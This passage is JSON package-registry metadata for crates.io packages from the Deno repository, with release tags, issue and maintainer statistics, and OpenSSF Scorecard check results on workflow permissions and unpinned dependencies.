036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-26T04:05:00.252Z","dependent_packages_count":0,"downloads":23171,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":25.881803102920557,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.04123786919347892,"forks_count":0.09988728315753782,"average":17.83070480100437},"purl":"pkg:cargo/deno_simple_runtime","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_simple_runtime","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_simple_runtime","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_simple_runtime/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:48:12.804Z","issues_count":6610,"pull_requests_count":9623,"avg_time_to_close_issue":17236144.535497494,"avg_time_to_close_pull_request":1534358.7653889374,"issues_closed_count":3787,"pull_requests_closed_count":8008,"pull_request_authors_count":577,"issue_authors_count":2467,"avg_comments_per_issue":2.509531013615734,"avg_comments_per_pull_request":0.7160968512937753,"merged_pull_requests_count":6992,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":664,"past_year_pull_requests_count":1191,"past_year_avg_time_to_close_issue":1367826.3136363637,"past_year_avg_time_to_close_pull_request":1331942.9891472869,"past_year_issues_closed_count":220,"past_year_pull_requests_closed_count":645,"past_year_pull_request_authors_count":182,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.216867469879518,"past_year_avg_comments_per_pull_request":1.0839630562552478,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":474,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1789,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":386,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/codemeta","maintainers":[{"uuid":"69523","login":"tyrchen","name":"Tyr Chen","email":null,"url":"https://github.com/tyrchen","packages_count":186,"html_url":"https://crates.io/users/tyrchen","role":null,"created_at":"2022-11-08T04:00:13.798Z","updated_at":"2022-11-08T04:00:13.798Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/tyrchen/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4490393,"name":"deno_snapshots","ecosystem":"cargo","description":"v8 snapshot used by the Deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":73,"first_release_published_at":"2022-06-30T20:30:24.596Z","latest_release_published_at":"2026-08-27T15:22:33.399Z","latest_release_number":"0.73.0","last_synced_at":"2026-09-07T22:54:36.770Z","created_at":"2022-06-30T20:31:07.531Z","updated_at":"2026-09-07T22:54:36.771Z","registry_url":"https://crates.io/crates/deno_snapshots/","install_command":"cargo install deno_snapshots","documentation_url":"https://docs.rs/deno_snapshots/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using 